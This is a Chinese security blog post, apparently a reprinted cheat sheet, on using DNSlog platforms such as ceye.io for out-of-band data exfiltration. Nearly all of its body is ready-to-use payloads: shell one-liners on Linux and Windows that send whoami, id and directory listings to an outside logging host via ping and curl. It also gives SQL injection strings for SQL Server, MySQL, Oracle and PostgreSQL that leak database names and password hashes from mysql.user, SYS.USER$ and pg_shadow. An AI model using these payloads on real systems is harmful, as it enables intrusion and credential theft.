<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="SQL,tools,reprint," />





  <link rel="alternate" href="/atom.xml" title="iSky0t's Notes" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/uploads/favicon.ico?v=5.1.2" />






<meta name="description" content="从其他地方看到，转载并总结下，记录下来以后可能会用到">
<meta name="keywords" content="SQL,tools,reprint">
<meta property="og:type" content="article">
<meta property="og:title" content="DNSlog利用方法记录">
<meta property="og:url" content="https://isky0t.github.io/2017/08/09/DNSlog利用方法记录/index.html">
<meta property="og:site_name" content="iSky0t&#39;s Notes">
<meta property="og:description" content="从其他地方看到，转载并总结下，记录下来以后可能会用到">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-10-13T02:09:46.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DNSlog利用方法记录">
<meta name="twitter:description" content="从其他地方看到，转载并总结下，记录下来以后可能会用到">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://isky0t.github.io/2017/08/09/DNSlog利用方法记录/"/>





  <title>DNSlog利用方法记录 | iSky0t's Notes</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">iSky0t's Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://isky0t.github.io/2017/08/09/DNSlog利用方法记录/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="iSky0t">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="iSky0t's Notes">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DNSlog利用方法记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-08-09T09:54:35+08:00">
                2017-08-09
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQL-Mark/" itemprop="url" rel="index">
                    <span itemprop="name">SQL-Mark</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/08/09/DNSlog利用方法记录/" class="leancloud_visitors" data-flag-title="DNSlog利用方法记录">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>从其他地方看到，转载并总结下，记录下来以后可能会用到<br><a id="more"></a></p>
<h2 id="DNSlog平台"><a href="#DNSlog平台" class="headerlink" title="DNSlog平台"></a>DNSlog平台</h2><p>CEYE：<a href="http://ceye.io/record/index" target="_blank" rel="external">http://ceye.io/record/index</a></p>
<p>土司：<a href="https://www.t00ls.net/dnslog.html" target="_blank" rel="external">https://www.t00ls.net/dnslog.html</a> （目前好像不能用)</p>
<h2 id="大概原理"><a href="#大概原理" class="headerlink" title="大概原理"></a>大概原理</h2><p>利用DNS解析的方法 从日志中提取关键解析请求 从而获取我们需要的数据</p>
<h2 id="终端下利用"><a href="#终端下利用" class="headerlink" title="终端下利用"></a>终端下利用</h2><p><strong>Linux</strong><br><figure class="highlight cmd"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">ping</span> -c <span class="number">1</span> `whoami`.xxx.dnslog.link</div><div class="line"> </div><div class="line">如果碰到内容有空格（换行符等），就会截断，只输出前面的，这时候可以利用编码来输出，但有输出字符数最大限制；</div><div class="line">curl http://xxx.dnslog.link/$(id|base64)</div><div class="line"> </div><div class="line">碰到ls这类多个输出的命令，直接使用脚本；</div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> $(ls /);<span class="keyword">do</span> curl "http://$i.xxx.dnslog.link/";done;</div></pre></td></tr></table></figure></p>
<p><strong>Windows</strong><br><figure class="highlight cmd"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">利用HTTP请求：</div><div class="line"><span class="keyword">for</span> /F %x <span class="keyword">in</span> ('whoami') <span class="keyword">do</span> <span class="built_in">start</span> http://xxx.dnslog.link/%x</div><div class="line">将结果使用默认浏览器弹出；</div><div class="line"> </div><div class="line">利用DNS请求：</div><div class="line">获取计算机名：<span class="keyword">for</span> /F "delims=\" %i <span class="keyword">in</span> ('whoami') <span class="keyword">do</span> <span class="built_in">ping</span> -n <span class="number">1</span> %i.xxx.dnslog.link</div><div class="line">获取用户名：<span class="keyword">for</span> /F "delims=\ tokens=<span class="number">2</span>" %i <span class="keyword">in</span> ('whoami') <span class="keyword">do</span> <span class="built_in">ping</span> -n <span class="number">1</span> %i.xxx.dnslog.link</div><div class="line"> </div><div class="line">不能编码输出，但利用powershell可以实现；</div><div class="line"> </div><div class="line"><span class="built_in">dir</span>有/b参数，不显示修改日期等信息，只显示文件名，所以可以弹出；</div><div class="line"><span class="keyword">for</span> /F %x <span class="keyword">in</span> ('<span class="built_in">dir</span> /b C:\') <span class="keyword">do</span> <span class="built_in">start</span> http://xxx.dnslog.link/[%x].jpg</div></pre></td></tr></table></figure></p>
<h2 id="SqlServer"><a href="#SqlServer" class="headerlink" title="SqlServer"></a>SqlServer</h2><p>在SqlServer中没有回显时 需要时间盲注或者布尔盲注的时候。可以考虑使用dnslog的方法去获取数据</p>
<p>获取当前数据库名称<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DECLARE</span> @host <span class="built_in">varchar</span>(<span class="number">1024</span>);<span class="keyword">SELECT</span> @host=<span class="keyword">CONVERT</span>(<span class="built_in">varchar</span>(<span class="number">1024</span>),db_name())+<span class="string">'.xxxxxxxxx.ceye.io'</span>;EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');<span class="comment">--</span></div><div class="line"></div><div class="line">注：db_name()  db_name(1)  db_name(2)…… 可以依次显示数据库</div></pre></td></tr></table></figure></p>
<p>获取当前数据库的表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DECLARE</span> @host <span class="built_in">varchar</span>(<span class="number">1024</span>);<span class="keyword">SELECT</span> @host=(<span class="keyword">select</span> top <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype=<span class="string">'u'</span>)+<span class="string">'.xxxxxxxxxx.ceye.io'</span>;EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');<span class="comment">--</span></div></pre></td></tr></table></figure></p>
<p>获取更多表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> top <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype=<span class="string">'u'</span> <span class="keyword">and</span> <span class="keyword">name</span> <span class="keyword">not</span> <span class="keyword">in</span> (<span class="string">'trace_xe_action_map'</span>)</div><div class="line"><span class="keyword">select</span> top <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype=<span class="string">'u'</span> <span class="keyword">and</span> <span class="keyword">name</span> <span class="keyword">not</span> <span class="keyword">in</span> (<span class="string">'trace_xe_action_map'</span>,<span class="string">'trace_xe_event_map'</span>)</div><div class="line">......</div></pre></td></tr></table></figure></p>
<h2 id="Mysql"><a href="#Mysql" class="headerlink" title="Mysql"></a>Mysql</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">password</span> <span class="keyword">FROM</span> mysql.user <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">LIMIT</span> <span class="number">1</span>),<span class="string">'.mysql.ip.port.b182oj.ceye.io\\abc'</span>));</div></pre></td></tr></table></figure>
<h2 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> UTL_INADDR.GET_HOST_ADDRESS(<span class="string">'ip.port.b182oj.ceye.io'</span>);</div><div class="line"><span class="keyword">SELECT</span> UTL_HTTP.REQUEST(<span class="string">'http://ip.port.b182oj.ceye.io/oracle'</span>) <span class="keyword">FROM</span> DUAL;</div><div class="line"><span class="keyword">SELECT</span> HTTPURITYPE(<span class="string">'http://ip.port.b182oj.ceye.io/oracle'</span>).GETCLOB() <span class="keyword">FROM</span> DUAL;</div><div class="line"><span class="keyword">SELECT</span> DBMS_LDAP.INIT((<span class="string">'oracle.ip.port.b182oj.ceye.io'</span>,<span class="number">80</span>) <span class="keyword">FROM</span> DUAL;</div><div class="line"><span class="keyword">SELECT</span> DBMS_LDAP.INIT((<span class="keyword">SELECT</span> <span class="keyword">password</span> <span class="keyword">FROM</span> SYS.USER$ <span class="keyword">WHERE</span> <span class="keyword">name</span>=<span class="string">'SYS'</span>)||<span class="string">'.ip.port.b182oj.ceye.io'</span>,<span class="number">80</span>) <span class="keyword">FROM</span> DUAL;</div></pre></td></tr></table></figure>
<h2 id="PostgreSQL"><a href="#PostgreSQL" class="headerlink" title="PostgreSQL"></a>PostgreSQL</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DROP</span> <span class="keyword">TABLE</span> <span class="keyword">IF</span> <span class="keyword">EXISTS</span> table_output;</div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> table_output(<span class="keyword">content</span> <span class="built_in">text</span>);</div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">OR</span> <span class="keyword">REPLACE</span> <span class="keyword">FUNCTION</span> temp_function()</div><div class="line"><span class="keyword">RETURNS</span> <span class="built_in">VOID</span> <span class="keyword">AS</span> $$</div><div class="line"><span class="keyword">DECLARE</span> exec_cmd <span class="built_in">TEXT</span>;</div><div class="line"><span class="keyword">DECLARE</span> query_result <span class="built_in">TEXT</span>;</div><div class="line"><span class="keyword">BEGIN</span></div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">INTO</span> query_result (<span class="keyword">SELECT</span> passwd</div><div class="line"><span class="keyword">FROM</span> pg_shadow <span class="keyword">WHERE</span> usename=<span class="string">'postgres'</span>);</div><div class="line">exec_cmd := E'COPY table_output(content)</div><div class="line">FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';</div><div class="line"><span class="keyword">EXECUTE</span> exec_cmd;</div><div class="line"><span class="keyword">END</span>;</div><div class="line">$$ LANGUAGE plpgsql SECURITY DEFINER;</div><div class="line"><span class="keyword">SELECT</span> temp_function();</div></pre></td></tr></table></figure>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.bodkin.ren/?p=790" target="_blank" rel="external">https://www.bodkin.ren/?p=790</a></p>
<p><a href="https://www.t00ls.net/viewthread.php?tid=40795&amp;highlight=dns" target="_blank" rel="external">https://www.t00ls.net/viewthread.php?tid=40795&amp;highlight=dns</a></p>
<p><a href="http://ceye.io/payloads" target="_blank" rel="external">http://ceye.io/payloads</a></p>

      
    </div>
    
    
    
    <div>
      
         
      
    </div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL/" rel="tag"># SQL</a>
          
            <a href="/tags/tools/" rel="tag"># tools</a>
          
            <a href="/tags/reprint/" rel="tag"># reprint</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/05/04/raspberrypi-web远程控制空调/" rel="next" title="raspberrypi-web远程控制空调">
                <i class="fa fa-chevron-left"></i> raspberrypi-web远程控制空调
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/10/01/hello-world/" rel="prev" title="Hello World">
                Hello World <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMTE0My83Njky"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          
            <img class="site-author-image" itemprop="image"
              src="/uploads/avatar.png"
              alt="iSky0t" />
          
            <p class="site-author-name" itemprop="name">iSky0t</p>
            <p class="site-description motion-element" itemprop="description">网络信息安全爱好者,大学狗</p>
        </div>

        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/iSky0t" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>GitHub</a>
              </span>
            
              <span class="links-of-author-item">
                <a href="mailto:isky0toor@gmail.com" target="_blank" title="E-Mail">
                  
                    <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#DNSlog平台"><span class="nav-number">1.</span> <span class="nav-text">DNSlog平台</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#大概原理"><span class="nav-number">2.</span> <span class="nav-text">大概原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#终端下利用"><span class="nav-number">3.</span> <span class="nav-text">终端下利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SqlServer"><span class="nav-number">4.</span> <span class="nav-text">SqlServer</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Mysql"><span class="nav-number">5.</span> <span class="nav-text">Mysql</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Oracle"><span class="nav-number">6.</span> <span class="nav-text">Oracle</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PostgreSQL"><span class="nav-number">7.</span> <span class="nav-text">PostgreSQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">8.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">iSky0t</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.2</div>




        




  <script type="text/javascript">
    (function() {
      var hm = document.createElement("script");
      hm.src = "//tajs.qq.com/stats?sId=63798059";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>


  

  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  








  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("kv5cy3Gfvg24pGeb1xi0W2qq-gzGzoHsz", "tLEuzWC42akUMRw9SgnyPxmt");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  

</body>
</html>
